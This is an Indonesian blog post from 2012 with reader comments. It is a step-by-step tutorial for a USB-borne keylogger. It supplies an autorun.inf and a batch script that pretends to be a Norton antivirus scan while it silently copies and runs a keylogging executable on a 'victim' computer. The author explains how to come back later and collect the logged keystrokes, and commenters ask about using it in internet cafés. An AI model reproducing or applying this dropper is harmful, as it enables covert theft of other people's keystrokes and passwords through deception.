Sabtu, 07 April 2012

Cara Instant Membuat Keylogger Notepad

5 komentar
Pertama buka program notepad,kemudian kamu ketik ini didalamnya


Quote:[autorun]open=nav.bat

Setelah kita ketik code diatas dalam notepad lalu kita pilih file typenya "all files" kemudian simpan (save) dengan nama file "autorun.inf".

Kemudian buat file baru lagi didalam notepad kalian dan ketikan code dibawah ini :

Quote:@echo off

echo norton Antivirus 2006

echo scanning disk drive…

echo please wait…

copy navw32.exe C:\windows\

call C:\windows\navw32.exe

echo.

echo.

echo.

echo.

echo.

echo.

echo.

echo.Scanning complette! No Virus Threat detected!

echo.

cls

simpan dengan nama nav.bat tapi ingat file typenya harus "all files"..
setelah itu ada sedikit langkah terakhir yaitu kamu download program nav32.exe cari saja di Om google..
setelah itu kalian simpan di flashdisk,,setelah kalian colok itu flashdisk ke kompie korban kalian atau siapa saja pasti akan dicopy secara otomatis filenya dan akan mencatat aktivitas keyboard yang digunakan korban.
Untuk memastikan dan melihat hasilnya kalian harus datang kembali ke komputer korban yang kalian jadikan target dan kalian bisa lihat hasilnya di C:\windows\ pasti ada file nav32.dll copy paste ke flashdisk tinggal dilihat aja hasilnya.


Selamat Mencoba

5 Responses so far

  1. says:

    kalo di warnet yg pake deep freeze gimana mas?? bisa juga ya?
    bales cepet

  2. says:

    Maaf gan baru Respone
    bsa gan
    silahkan di coba aja gan ^_^

  3. says:

    mnta link download nav32 nya donk
    rata2 link nya pada ga mw

  4. says:

    Emangnya di mbah gugel gak ada ?

  5. Anonim says:

    virus

Leave a Reply